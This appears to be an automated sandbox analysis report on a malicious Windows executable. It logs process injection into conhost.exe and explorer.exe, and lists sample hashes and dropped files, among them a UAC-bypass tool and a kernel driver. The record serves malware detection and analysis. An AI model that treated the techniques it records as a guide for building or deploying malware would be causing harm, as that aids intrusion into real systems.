Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtAllocateVirtualMemory: Direct from: 0x401D97	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140000000 value: 4D	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140001000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140367000 value: 1E	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 1404A0000 value: F0	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140753000 value: 00	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140775000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140776000 value: C5	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140777000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 140779000 value: 48	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 14077B000 value: 60	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 14077C000 value: 00	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: 14077D000 value: 00	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 1320 base: FC1010 value: 00	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Memory written: C:\Windows\System32\conhost.exe base: 236C4F60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory written: C:\Windows\System32\conhost.exe base: 1EC44910000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory written: C:\Windows\System32\conhost.exe base: 2474E5A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140367000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 1404A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140753000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140775000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140776000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140777000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 140779000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 14077B000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 14077C000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: 14077D000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\explorer.exe base: FC1010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 25C64110000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D90D160000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 24457CD0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 2A914300000	Jump to behavior

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Queries volume information: C:\Users\user\Desktop\GcqJPBLD2Q.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

ID:	1528492
Product:	CloudBasic
Start time:	00:16:03
Start date:	08.10.2024
Sample:	GcqJPBLD2Q.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	831c0b3184feb755997ee1ec5e474ca8
SHA1:	45daae9fbc40e84523ff7bf15742f6bf7bac1462
SHA256:	3deb1c82c0d030534d168b9857c7ed13815917146448e1ab6844f4a90edc2a7d
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_conhost.exe_bcf865d76fe77467e295cbb71eb4f98b4a9050eb_1260788c_f2492fca-a4a7-4d85-a745-6ca7b235bc24\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	BE314ED4F74A781D5D17F40FBCE98303	54340D96581AD8252E4454068159D379BBA4548E	CF4C0C4F7BC0819893166937DD0BF25DACAD1753294EB9EA05229DEBAE95387D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER684F.tmp.dmp	Mini DuMP crash report, 15 streams, Mon Oct 7 22:20:14 2024, 0x1205a4 type	7E09C6A66018CB3482B3B23591E93A32	C3D753FB80E440D4F5550FB98DECA03ED6EE73CB	6E5D07E7B4B52391701BB787F97BE7BE3E2E676C264EAC3867F263C77D11EC8A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7001.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	7F38EFBEE58236BD3D41FAD187860ECB	8035FCF66BB6E79E9AE25CD0DEF24F59FE6E7448	633B763CE8264EC29731C7D675ACE5CB3A34C68A40E4F42F24AFD7DACFF3008C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7050.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	58496B6DBFCCE7910CD38CCCA9C005BC	E1223FA9B9444B11073BE14D5314F31E1A04D385	1CA28B1D69DFFFB9A91FA7C27428D74B2127958C7D5CC5CF780F21A05D7BBA67
C:\ProgramData\Microsoft\Windows\WER\Temp\WER706D.tmp.csv	data	47441003442829816E59A5B2DCECD786	358B22C02C0C4654DE0A73E79C7B9F693E4FCF9D	5A7594F262A5C235B084C9D3E1FD476EA90E0510A78AFF518144048B200CFE46
C:\ProgramData\Microsoft\Windows\WER\Temp\WER70CC.tmp.txt	data	F85DD3EC26DC0180F6CEA7E25FC7B5CF	302C38B9B6D4FA24D7C96585E952C42D1721E643	80058868C5D7FB9811F59FB3BC909F7452FDCEF8A1944E855EA8868EC9A5AC1A
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GcqJPBLD2Q.exe.log	CSV text	D8F8A79B5C09FCB6F44E8CFFF11BF7CA	669AFE705130C81BFEFECD7CC216E6E10E72CB81	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	ASCII text, with CRLF line terminators	7155C0B26CEC4BA9E8198691F0343F69	0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF	59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	11E11881DB10CF040A1189171FFA58F4	FA0557B00771F196EF84B8274DCF7D079278811D	2060C23CA036F0750DFC90E1C6D5374136E9D90262F6D125FC39BF72F75727A8
C:\Users\user\AppData\Local\Temp\Cool.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	DEF89B601B7DDD52A94E15DBD38EAEEF	EA87B102BC3A5C8979288A9FFD8AC27595E86E05	1494DA12B79A3EA799839680B25359BA84EB0BE102ED93060FEA5A9F17D2323C
C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	PE32+ executable (console) x86-64, for MS Windows	83588784E36FE1894F499CAF5FAD5ED8	03B9E7CBBCF334A9526A776505797FF3FF73766B	2E9AA76BCA1D33AFA183192E52AAAE388F2CC21AD84DB61624B08B40E88B684B
C:\Users\user\AppData\Local\Temp\DccwBypassUAC.pdb	MSVC program database ver 7.00, 4096*297 bytes	619A85E6061155BEFE3D4A544C14349D	37C9EAC43CF9B7872898246A719DD4251CAC235C	8F25F7419C770875786875478011E4EEF0A219E916980B02FD0FCE4565DA9754
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bvc44fe.sdv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43dity4a.ab5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xw53nwnr.flv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yncfji4m.lsy.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\services64.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	DEF89B601B7DDD52A94E15DBD38EAEEF	EA87B102BC3A5C8979288A9FFD8AC27595E86E05	1494DA12B79A3EA799839680B25359BA84EB0BE102ED93060FEA5A9F17D2323C
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	PE32+ executable (native) x86-64, for MS Windows	0C0195C48B6B8582FA6F6373032118DA	D25340AE8E92A6D29F599FEF426A2BC1B5217299	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	3C9FA255FE0A761E4D8535039EB86F5C	96AE8A31237B25A797D568BCD333C5BDF662831A	B7677CB95ABC6682AA804B48587EE1ED1AF1DE992EC306B78FFE8F04673F68B3
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	FB997A1D33B94FD6E6DA21B0E277D34A	AE9DF20621B026E338833D50A807D6B14B10387A	E9512874C456A39F62092ACB9EF784C6F90D51483C0C2C772867EB9A02CA5983
\Device\ConDrv	ASCII text, with CRLF line terminators	5FF7DCF7E909CD47FDFE031DDD3ED725	01405756D79C45775E0C714477CF90A02734F5A8	31BFB31EC755CFF97D956A78CB86F9E6E057B0014934A5C5949C716209B6F868